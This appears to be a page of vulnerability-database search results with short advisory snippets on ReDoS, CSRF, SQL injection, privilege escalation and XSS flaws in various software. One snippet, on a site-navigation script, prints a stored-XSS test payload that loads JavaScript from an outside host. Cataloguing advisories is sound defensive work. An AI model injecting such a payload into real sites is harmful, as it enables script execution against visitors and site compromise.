Lucene search

19 matches found

EUVD
added 2025/10/03 8:7 p.m. · 2 views

EUVD-2022-5926

Malicious code in bioql PyPI...

CVSS 7.5 · AI score 7.7 · EPSS 0.00585
Exploits 1 · References 5
OSV
added 2022/06/03 12:1 a.m. · 0 views

GHSA-4X5V-GMQ8-25CH Regular expression denial of service in semver-regex

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test method...

CVSS 7.5 · AI score 7.2 · EPSS 0.00585
Exploits 1 · References 4
OSV
added 2022/06/02 2:15 p.m. · 18 views

CVE-2021-43307

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test method...

CVSS 7.5 · AI score 6.8
Exploits 0 · References 1
Cvelist
added 2022/06/01 4:47 p.m. · 21 views

CVE-2021-43307 Exponential ReDoS in semver-regex

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test method...

CVSS 5.9 · AI score 8 · EPSS 0.00585
Exploits 1 · References 1
Positive Technologies
added 2022/06/01 12:0 a.m. · 2 views

PT-2022-11819 · Npm · Semver-Regex

Name of the Vulnerable Software and Affected Versions: semver-regex (affected versions not specified). Description: An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package when an attacker supplies arbitrary input to the test method. Recommendations...

CVSS 7.5 · AI score 7.4 · EPSS 0.00585
Exploits 1 · References 8
Github Security Blog
added 2021/06/16 5:28 p.m. · 51 views

CSRF vulnerability in Jenkins Xray - Test Management for Jira Plugin allows capturing credentials

Jenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier does not require POST requests for a connection test method, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified...

CVSS 7.1 · AI score 6.5 · EPSS 0.00257
Exploits 0 · References 3 · Affected Software 1
UbuntuCve
added 2019/11/20 12:0 a.m. · 136 views

CVE-2019-16255

Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows code injection if the first argument (aka the "command" argument) to Shell#[] or Shell#test in lib/shell.rb is untrusted data. An attacker can exploit this to call an arbitrary Ruby method...

CVSS 8.1 · AI score 6.7 · EPSS 0.01157
Exploits 1 · References 3
myhack58
added 2015/01/05 12:0 a.m. · 12 views

Google found Windows 8.1 0day vulnerabilities and published vulnerabilities verify program PoC-the exploit-warning-the black bar safety net

Google security researcher found a Windows 8.1 privilege escalation vulnerability, the attacker can use the vulnerability to modify the system content and even completely control the victim computer. Currently Google has announced a vulnerability in the authentication program, the PoC Airport. Po...

AI score 0.8
Exploits 0
myhack58
added 2012/05/24 12:0 a.m. · 21 views

PHP Address Book 7.0.0 plurality of defect and repair-vulnerability warning-the black bar safety net

Title: PHP Address Book 7.0.0 Multiple security vulnerabilities Author: Stefan Schurtz Affected Software: Successfully tested on PHP Address Book 7.0.0 Developer website: http://sourceforge.net/projects/php-addressbook/ Defect description PHP Address Book 7.0.0 containing multiple XSS and SQLi...

AI score 7.5
Exploits 0
seebug.org
added 2012/04/23 12:0 a.m. · 13 views

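VLC Media Player Divide-by-Zero Denial of Service Vulnerability

BUGTRAQ ID: 53169 VLC Media Player is a multimedia player (originally named VideoLAN Client) from the VideoLAN project. VLC Media Player has a denial of service vulnerability in its handling of malformed .mp4 files; an attacker can exploit it to crash the affected application. 0 VLC Media Player 2.0.1 Vendor patch: VideoLAN -------- The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version: http://www.videolan.org/ Senator () provided the following test method: Data =...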

AI score 6.9
Exploits 0
seebug.org
added 2011/11/23 12:0 a.m. · 26 views

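Microsoft Windows Kernel "Win32k.sys" Keyboard Layout Local Privilege Escalation Vulnerability

BUGTRAQ ID: 50763 Microsoft Windows is a popular computer operating system. Win32k.sys has an indexing error in its implementation; when loading a keyboard layout file, a local attacker can, by accessing an invalid memory location, exploit this vulnerability to execute arbitrary code with kernel privileges and take full control of the affected computer. Microsoft Windows XP Microsoft Windows 7 Vendor patch: Microsoft --------- The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version: http://www.microsoft.com/windowsxp/default.asp instruder...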

AI score 6.9
Exploits 0
seebug.org
added 2011/03/18 12:0 a.m. · 33 views

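Trend Micro WebReputation API URI Security Restriction Bypass Vulnerability

BUGTRAQ ID: 46864 Trend Micro WebReputation API is Trend Micro's web reputation application programming interface. Trend Micro WebReputation API has a security restriction bypass vulnerability in its implementation; a remote attacker can exploit it to bypass the filter included in the download mechanism and download malicious files to the affected computer. Trend Micro WebReputation API 10.5 Trend Micro WebReputation API 0 Vendor patch: Trend Micro ----------- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:...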

AI score 6.9
Exploits 0
myhack58
added 2010/07/01 12:0 a.m. · 26 views

114. Site Navigation Station system of V1.13 XSS cross-site attacks-vulnerability warning-the black bar safety net

url-submit/index.php to submit the data is not filtered directly into the database, resulting in a savings of XSS vulnerability Test method: In the Site Name column fill in the script src=http://www. hackqing. cn/qingexp. js/script (src is fill in your own js file for the address, don't tell me that t...

AI score 7.2
Exploits 0
myhack58
added 2009/08/05 12:0 a.m. · 27 views

Serv-U FTP Server v8 local privilege escalation-vulnerability warning-the black bar safety net

Author: the emptiness of the prodigal son heart Release date: 2009-08-05 Updated date: 2009-08-05 Affected systems: serv-u8 Not affected systems: Other versions are not affected Description: See cnbeta found su 8 This version. Think before write a 7 local privilege escalation. Don't know 8 what the securit...

AI score 7.6
Exploits 0
myhack58
added 2009/07/02 12:0 a.m. · 8 views

BBSGood. Speed Version 4.0 injection vulnerability-vulnerability warning-the black bar safety net

| Version: BBSGood. Speed Version 4.0 Vulnerability file: The UserInfo.asp Vulnerability description: Variable Blogurl unfiltered into an sql statement, leading to SQL injection vulnerability --- Code example: Line 1729-1853. | case 1 4 if Request. QueryString"save"=1 then if trimRequest...

AI score 0.8
Exploits 0
myhack58
added 2009/04/28 12:0 a.m. · 10 views

Internet Download Manager language file parsing stack overflow vulnerability-vulnerability warning-the black bar safety net

Affects versions: Tonec Inc Internet Download Manager 5.15 Build 3 Test method: PoC Internet Download Manager v. 5. 1 5 Build 3 4 In December Works on Vista HellCode Labs || TCC Group || http://tcc.hellcode.net The Bug was found by "musashi" aka karak0rsan [email protected] thanx to murderkey...

AI score 1
Exploits 0
myhack58
added 2009/04/13 12:0 a.m. · 26 views

PHPWIND & DISCUZ! CSRF vulnerability-vulnerability warning-the black bar safety net

PHPWIND & DISCUZ! CSRF vulnerability affects versions: Discuz! 6.0.0 & 6.1.0 & 7.0.0 PHPWIND 6.0 & 6.3 & 7.0 Vulnerability description: PHPWIND & DISCUZ! The presence of CSRF vulnerabilities, triggering PHPWIND & DISCUZ! CSRF WORM! ... d/b31e4d2e6270c384 reference ... d/b31e4d2e6270c384 Safety...

AI score 7
Exploits 0
seebug.org
added 2008/10/25 12:0 a.m. · 51 views

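Verity's Search 97 Arbitrary File Viewing Vulnerability

BUGTRAQ: 162 Verity's Search97 is the web access interface to Verity's search engine. The search97.vts script in Verity's Search97 does not adequately filter user input; a remote attacker may exploit this vulnerability to carry out a directory traversal attack, leading to disclosure of system files. The search97.vts script in the package does not adequately filter ".." in user input; an attacker may craft a special request to read any file on the server that the web service process has read permission for. 2.1 Temporary workaround: If you cannot install the patch or upgrade immediately, we recommend the following measures to reduce the threat: Temporarily stop using the software. Vendor patch: Verity ------...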

AI score 7.1
Exploits 0
seebug.org
added 2006/12/08 12:0 a.m. · 9 views

AdamIsmayPrintTopicMod SQL Injection Vulnerability Exploit

No description provided by source. Bartek Nowotarski ([email protected]) provided the following test method:...

AI score 7.1
Exploits 0